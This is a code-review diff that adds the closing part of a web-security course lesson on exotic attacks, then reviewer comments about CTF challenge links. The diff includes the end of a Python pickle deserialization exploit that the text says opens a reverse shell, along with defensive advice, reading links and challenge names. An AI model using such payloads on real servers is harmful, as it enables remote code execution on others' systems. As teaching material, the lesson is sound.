exotic-attacks/index.md

```diff
@@ -0,0 +1,562 @@
+        return os.system, (cmd,)
+
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(RCE())
+    print(base64.urlsafe_b64encode(pickled))
+```
+
+This code will generate a reverse shell, which opens the possibility of **RCE** on the target machine.
+Again, it's one of the most dangerous vulnerabilities for a web application, whatever the programming language was chosen for the back-end (be it **PHP**, **Python**, **JavaScript**, **Ruby**, etc.), and the programmer should be aware and protect it against malicious actors.
+Also, always research the functions and modules used inside your application to prevent such vulnerabilities.
+
+# Wrap-Up
+
+As you have seen so far, even a small mistake, such as using `==` instead of `===`, can cause your application to break at unexpected input.
+From an attacker standpoint, you can never know if the programmer was careful enough when writing the code, so you should always research and test what exploits can the application be vulnerable to, specific to the language / framework used.
+
+The most important aspect we kept talking about during all the sessions is to never trust the user input.
+He can have malicious thoughts and purposefully try to break the application or he can unknowingly send a bad request and achieve the same result.
+In conclusion, the code should be properly tested before being put in production and the user input should always be carefully sanitized.
+
+# Further Reading
+
+* https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
+* https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/
+* https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
+* https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/
+* https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
+* https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
+* https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/
+* https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/
+* https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
+* https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace
+* https://www.whitehatsec.com/blog/magic-hashes/
+* https://davidhamann.de/2020/04/05/exploiting-python-pickle/
+
+# Activities
+
+* [Breaking Hashes](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [Defaced Website](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [Handy Tool](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [Jar of Pickles](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [Meme Uploader](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [Pro Replacer](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
+* [TODO App](https://sss-ctf.security.cs.pub.ro/challenges?category=web-sessions)
```

Comment:
Don't forget to update links.

Reply:
@gabrielmocanu added the challenges, but they're not public yet

Reply:
@carrrina  I made them public, please update the links.